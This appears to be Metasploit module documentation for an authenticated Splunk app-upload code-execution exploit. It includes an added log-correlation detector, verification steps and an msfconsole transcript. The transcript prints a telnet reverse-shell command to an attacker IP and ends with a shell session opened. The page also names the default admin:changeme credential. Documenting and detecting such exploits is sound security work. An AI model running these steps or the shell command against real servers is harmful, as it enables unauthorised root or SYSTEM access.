Vulnerable Application
This module exploits a feature of Splunk whereby a custom application can be
uploaded through the web-based interface. Through the `script` search command, a
user can call commands defined in their custom application, which can include arbitrary
Perl or Python code. To abuse this behavior, a valid Splunk user with the admin
role is required. By default, this module uses the credential "admin:changeme",
the default Administrator credential for Splunk.
Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux, by default.
This module has been tested successfully against:
- 5.0 (Ubuntu 10.04, Windows XP and Windows Server 2003 SP2 with splunk-5.0.1-143156)
- 6.1, 6.1.1
- 7.2.4 (OSX 10.14.3, Windows 10 10.0.17134.1, CentOS7 3.10.0-957.1.3.el7.x86_64)
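The two steps the module chains together, an app package uploaded through the web UI and a search that invokes the `script` command, both leave traces in Splunk's own logs. The following is an added example, not code from the module or from Splunk: a small detector that flags POSTs to the upload endpoint shown later in this page (`/en-US/manager/appinstall/_upload`) in `web_access.log`, flags granted searches whose pipeline calls `script` (alias `run`) in `audit.log`, and raises the severity when the same user did both within a short window. The sample log lines are constructed; the field layouts of both logs and the use of one shared host clock are assumptions.

```python
"""Added example: detect app upload followed by a `script` search in Splunk logs."""
import re
from datetime import datetime, timedelta

# Constructed sample of web_access.log, assumed to follow the Apache-combined-like
# layout: ip - user [timestamp] "METHOD path proto" status bytes "referer" "agent".
WEB_ACCESS_SAMPLE = """\
10.0.0.5 - admin [17/Mar/2019:22:12:30.101 +0100] "POST /en-US/account/login HTTP/1.1" 303 - "-" "Mozilla/5.0"
10.0.0.5 - admin [17/Mar/2019:22:12:31.210 +0100] "GET /en-US/manager/appinstall/_upload HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
10.0.0.5 - admin [17/Mar/2019:22:12:32.305 +0100] "POST /en-US/manager/appinstall/_upload HTTP/1.1" 303 - "-" "Mozilla/5.0"
10.0.0.7 - alice [17/Mar/2019:22:14:00.000 +0100] "GET /en-US/app/search/search HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""

# Constructed sample of audit.log search events. The leading fields follow the
# "Audit:[timestamp=..., user=..., action=search, ..., search='...']" layout;
# the exact set of trailing fields is assumed.
AUDIT_SAMPLE = """\
Audit:[timestamp=03-17-2019 22:12:33.000, user=admin, action=search, info=granted, search_id='1552857153.7', search='| script upload_app_exec', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME']
Audit:[timestamp=03-17-2019 22:15:10.000, user=alice, action=search, info=granted, search_id='1552857310.9', search='search index=main | stats count by status', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME']
"""

WEB_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
AUDIT_RE = re.compile(
    r"timestamp=(?P<ts>\d\d-\d\d-\d{4} \d\d:\d\d:\d\d\.\d{3}), user=(?P<user>[^,]+), "
    r"action=search, info=granted.*?search='(?P<search>.*?)'(?=, \w+=|\])")
# The script command (alias: run) is what the module invokes after the upload.
SCRIPT_CMD_RE = re.compile(r"\|\s*(script|run)\b")
UPLOAD_PATH = "/manager/appinstall/_upload"


def _web_ts(raw):
    # Drop the zone so it compares with the zone-less audit timestamp
    # (assumes both logs come from the same host and clock).
    return datetime.strptime(raw, "%d/%b/%Y:%H:%M:%S.%f %z").replace(tzinfo=None)


def find_app_uploads(lines):
    """Return POSTs to the app-install upload endpoint (app packages sent via the web UI)."""
    hits = []
    for line in lines:
        m = WEB_RE.match(line)
        if m and m["method"] == "POST" and UPLOAD_PATH in m["path"]:
            hits.append({"ts": _web_ts(m["ts"]), "user": m["user"],
                         "ip": m["ip"], "path": m["path"]})
    return hits


def find_script_searches(lines):
    """Return granted searches whose pipeline invokes the script (run) command."""
    hits = []
    for line in lines:
        m = AUDIT_RE.search(line)
        if m and SCRIPT_CMD_RE.search(m["search"]):
            hits.append({"ts": datetime.strptime(m["ts"], "%m-%d-%Y %H:%M:%S.%f"),
                         "user": m["user"], "search": m["search"]})
    return hits


def correlate(uploads, script_searches, window=timedelta(minutes=30)):
    """One alert per script search; 'high' if the same user uploaded an app shortly before."""
    alerts = []
    for s in script_searches:
        prior = [u for u in uploads
                 if u["user"] == s["user"] and timedelta(0) <= s["ts"] - u["ts"] <= window]
        alerts.append({"severity": "high" if prior else "medium", "user": s["user"],
                       "search": s["search"], "uploads": prior})
    return alerts


if __name__ == "__main__":
    uploads = find_app_uploads(WEB_ACCESS_SAMPLE.splitlines())
    for a in correlate(uploads, find_script_searches(AUDIT_SAMPLE.splitlines())):
        print(a["severity"], a["user"], repr(a["search"]), [u["path"] for u in a["uploads"]])
```

Run against the samples, the admin upload at 22:12:32 followed by `| script upload_app_exec` at 22:12:33 produces one high-severity alert; alice's ordinary search produces nothing. On a real deployment the two files live under `$SPLUNK_HOME/var/log/splunk/`, and a `script` search with no matching upload still deserves a look, since a previously installed app can be reused. Replacing the default `admin:changeme` credential removes the precondition the module relies on in the first place.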
Verification Steps
- Start msfconsole
- Do: `use exploit/multi/http/splunk_upload_app_exec`
- Set required variables (you will need admin credentials)
- Do: `SET LHOST [ip]`
- Do: `SET RHOST [ip]`
- If targeting linux or macos the payload `cmd/unix/reverse_python` will be automatically selected.
- If targeting windows the payload `cmd/windows/adduser` will be automatically selected.
- You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user (windows target)
External Demo
Options
- `EnableOverwrite`: Overwrites an app of the same name. Needed if you change the app code in the tgz. Not enabled by default.
Scenarios
Testing against 7.2.4 running on OSX
Given admin credentials, we can upload the custom app to Splunk, which will provide us with a reverse shell triggered through the 'search' field API.
msf5 exploit(multi/http/splunk_upload_app_exec) >
msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1
RHOST => 172.16.165.1
msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk
password => splunksplunk
msf5 exploit(multi/http/splunk_upload_app_exec) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Splunk >= 7.2.4 / Linux
2 Splunk >= 7.2.4 / Windows
3 Splunk >= 7.2.4 / OSX
4 Splunk >= 5.0.1 / Linux
5 Splunk >= 5.0.1 / Windows
msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3
target => 3
msf5 exploit(multi/http/splunk_upload_app_exec) > exploit
[*] Started reverse TCP double handler on 172.16.165.206:4444
[*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)'
[*] Authenticating...
[*] Fetching state token from /en-US/manager/appinstall/_upload
[*] Uploading file upload_app_exec.tgz
[+] upload_app_exec successfully uploaded
[*] Invoking script command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8kNbt70jYB3aJKPm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n8kNbt70jYB3aJKPm\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100